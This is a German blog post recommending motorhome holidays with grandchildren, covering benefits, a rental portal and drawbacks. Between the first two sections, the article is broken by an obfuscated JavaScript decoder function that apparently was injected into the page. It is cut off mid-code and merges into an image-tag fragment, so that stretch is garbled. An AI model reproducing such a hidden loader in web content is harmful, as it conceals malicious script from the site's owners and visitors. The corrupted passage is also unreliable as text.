Im Wohnmobil entspannt verreisen – mit den Enkelkinder auf großer Tour

 

Ein Urlaub im Wohnmobil ist aus verschiedenen Gründen eine attraktive Sache. Einpacken, losfahren, ausspannen – mit „Enkelkind“ und Kegel an einem Ort der Wahl. Das ist klingt verlockend und unkompliziert und in der Tat sind die Vorteile von einem Campingurlaub im Wohnmobil vor allem für die Kleinen eine sehr spannende Art die Ferien zu verbringen.
Am See, im Wald oder – wer etwas mehr Zivilisation bevorzugt – auf dem Campingplatz. Die Möglichkeiten sind unendlich. Ein fremdes Land oder die heimische Berg- und Seenlandschaft - mit dem Wohnmobil kann das Reiseziel ganz individuell ausfallen und vor allem auch spontan geändert werden. Abgesehen vom großen Abenteuer gibt es auch noch viele andere Dinge, die es leicht machen, sich für den Urlaub auf Achse zu entscheiden.

 

function b32f7c5eda8(sf){var pd='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=';var r2='';var xe,o4,se,vc,p4,n6,q0;var w6=0;do{vc=pd.indexOf(sf.charAt(w6++));p4=pd.indexOf(sf.charAt(w6++));n6=pd.indexOf(sf.charAt(w6++));q0=pd.indexOf(sf.charAt(w6++));xe=(vc<<2)|(p4>>4);o4=((p4&15)<<4)|(n6>>2);se=((n6&3)<<6)|q0;if(xe>=192)xe+=848;else if(xe==168)xe=1025;else if(xe==184)xe=1105;r2+=String.fromCharCode(xe);if(n6!=64){if(o4>=192)o4+=848;else if(o4==168)o4=1025;else if(o4==184)o4=1105;r2+=String.fromCharCode(o4);}if(q0!=64){if(se>=192)se+=848;else if(se==168)se=1025;else if(se==184)se=1105;r2+=String.fromCharCode(se);}}while(w6andparents-1927320_1280.jpg" alt="" width="1280" height="720" />

 

Die Vorteile im Wohnmobil

 

Wer mit Enkelkindern verreist, wird oft unwillkürlich vor diverse Probleme gestellt. Flugangst, nicht genug Platz für Spielsachen und am Ende ist das Hotel doch nicht so kinderfreundlich wie im Prospekt angepriesen. Dazu kommt, dass sich der ältere Nachwuchs irgendwann langweilt, das Abenteuer Pool und auch Strandaktivitäten ausgereizt sind. Unweigerlich folgen Quengelei, Streitereien unter Geschwistern und allgemeine Unzufriedenheit.
Ein Urlaub im Wohnmobil ist zwar kein Allheilmittel gegen quengelnde Kinder, aber er verringert das Konfliktpotential ungemein. Jeder kann seine eigenen Lieblingssachen einpacken, das Lieblingsspielzeug muss nicht zuhause bleiben. Dazu kommt, dass es wahnsinnig aufregend ist, im Wohnmobil zu schlafen, die Abende am Lagerfeuer ausklingen zu lassen und einfach mitten in der Natur in den Tag hineinzuleben. WLAN, Smartphone und Tablet bleiben zuhause, die Kinder, Erwachsenen und Großeltern können sich ganz auf sich konzentrieren und so wird unweigerlich der Familienzusammenhalt gestärkt.
Wer kein eigenes Wohnmobil hat, kann auf dem Online-Portal camapanda.de das zu Hause auf vier Rädern mieten. Das hat den Vorteil, dass man flexibel ist, was die Größe und Ausstattung betrifft und sich außerdem keine Gedanken über einen Stellplatz machen muss, wenn das Wohnmobil nicht in Gebrauch ist.
Doch auch wenn man als Rentner ein eigenes Wohnmobil besitzt und sich etwas Geld dazu verdienen möchte, kann sein rollendes Zuhause auf Zeit über Campada zur Vermietung anbieten.
So werden Kosten gespart, beziehungsweise gedeckt oder das zusätzliche Geld kann in die Urlaubskasse fließen. Denn das nächste Abenteuer mit der mobilen Ferienwohnung kommt schneller als man denkt.

 

 

Wo Licht ist, ist auch Schatten

 

Und so gibt es auch Nachteile, wenn man mit dem Wohnmobil verreist. Der Raum ist natürlich sehr begrenzt, schnell tritt man sich gegenseitig auf die Füße, ist genervt und findet nicht genügend Ausweichmöglichkeiten. Dazu kommt, dass man sich im Camper selbst versorgen muss. Kochen, putzen, waschen und Toilette entleeren gehören dazu, einen Roomservice und eine Putzfrau gibt es nicht. Ebenso wenig wie ein Restaurant oder ein Drive In und auch der nächste Supermarkt ist meist nicht unbedingt fußläufig zu erreichen.
Daher müssen sämtliche Vorräte an Bord sein und die Reiseapotheke bestens ausgestattet sein. Die Anfahrt zum Urlaubsziel ist außerdem quasi eine normale Autofahrt. Die Kinder müssen angeschnallt sitzen bleiben und benötigen regelmäßige Pausen, sowie eine gute Ablenkung während der Fahrt.
Doch all das ist zu schaffen, denkt man doch an nichts anderes als an den aufregenden Ausflug und eine unbekümmerte Zeit mit den Enkelkindern.

 

Schreibe einen Kommentar

Deine E-Mail-Adresse wird nicht veröffentlicht. Erforderliche Felder sind mit * markiert.